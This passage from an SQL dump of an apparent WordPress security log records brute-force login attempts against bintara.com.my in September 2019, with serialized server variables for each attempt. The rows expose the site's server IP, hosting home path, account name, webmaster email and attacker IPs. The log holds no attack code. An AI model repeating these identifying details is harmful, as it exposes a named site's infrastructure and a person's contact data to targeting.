17:38:15',17742880,19233552,'https://bintara.com.my/wp-login.php',1,0,'216.10.243.118'),(24202,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"87\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"31.220.51.115\";s:11:\"REMOTE_PORT\";s:5:\"35990\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-Jf2kPXSyJlCUJQmoblQAAAYM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568655743.731\";s:12:\"REQUEST_TIME\";s:10:\"1568655743\";}}','notice','2019-09-16 17:42:26','2019-09-16 17:42:24',17741712,19233056,'https://bintara.com.my/wp-login.php',1,0,'31.220.51.115'),(24203,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"31.220.51.115\";s:11:\"REMOTE_PORT\";s:5:\"37638\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-JhGShanGhHYaqyCSgewAAAA0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568655749.9882\";s:12:\"REQUEST_TIME\";s:10:\"1568655749\";}}','notice','2019-09-16 17:42:38','2019-09-16 17:42:30',18260464,19557712,'https://bintara.com.my/xmlrpc.php',1,0,'31.220.51.115'),(24204,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"159.65.69.32\";s:11:\"REMOTE_PORT\";s:5:\"51570\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-LQGShanGhHYaqyCShhQAAAAA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568656193.6245\";s:12:\"REQUEST_TIME\";s:10:\"1568656193\";}}','notice','2019-09-16 17:49:54','2019-09-16 17:49:53',17739808,19230304,'https://bintara.com.my/wp-login.php',1,0,'159.65.69.32'),(24205,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"132.148.146.230\";s:11:\"REMOTE_PORT\";s:5:\"57606\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-LRNK-omY048@iBsMPNgAAAMg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568656196.383\";s:12:\"REQUEST_TIME\";s:10:\"1568656196\";}}','notice','2019-09-16 17:49:57','2019-09-16 17:49:56',17737576,19227488,'https://bintara.com.my/wp-login.php',1,0,'132.148.146.230'),(24206,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"132.148.146.230\";s:11:\"REMOTE_PORT\";s:5:\"58426\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-LR7Ip53uPsY7BKAq5UgAAAEI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568656199.4856\";s:12:\"REQUEST_TIME\";s:10:\"1568656199\";}}','notice','2019-09-16 17:50:01','2019-09-16 17:49:59',18259024,19557520,'https://bintara.com.my/xmlrpc.php',1,0,'132.148.146.230'),(24207,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"2.82.143.65\";s:11:\"REMOTE_PORT\";s:5:\"47858\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-NMtK-omY048@iBsMPhwAAANU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568656691.0317\";s:12:\"REQUEST_TIME\";s:10:\"1568656691\";}}','notice','2019-09-16 17:58:12','2019-09-16 17:58:11',17747160,19233592,'https://bintara.com.my/wp-login.php',1,0,'2.82.143.65'),(24208,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"2.82.143.65\";s:11:\"REMOTE_PORT\";s:5:\"47858\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-NMtK-omY048@iBsMPhwAAANU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568656691.0317\";s:12:\"REQUEST_TIME\";s:10:\"1568656691\";}}','notice','2019-09-16 17:58:12','2019-09-16 17:58:11',17908824,19233592,'https://bintara.com.my/wp-login.php',1,0,'2.82.143.65'),(24209,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"2.82.143.65\";s:11:\"REMOTE_PORT\";s:5:\"22795\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-NNmShanGhHYaqyCSifwAAABU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568656694.179\";s:12:\"REQUEST_TIME\";s:10:\"1568656694\";}}','notice','2019-09-16 17:58:15','2019-09-16 17:58:14',18260176,19556008,'https://bintara.com.my/xmlrpc.php',1,0,'2.82.143.65'),(24210,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"31.14.128.73\";s:11:\"REMOTE_PORT\";s:5:\"49577\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-ORGShanGhHYaqyCSjKAAAAAg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568656965.1376\";s:12:\"REQUEST_TIME\";s:10:\"1568656965\";}}','notice','2019-09-16 18:02:47','2019-09-16 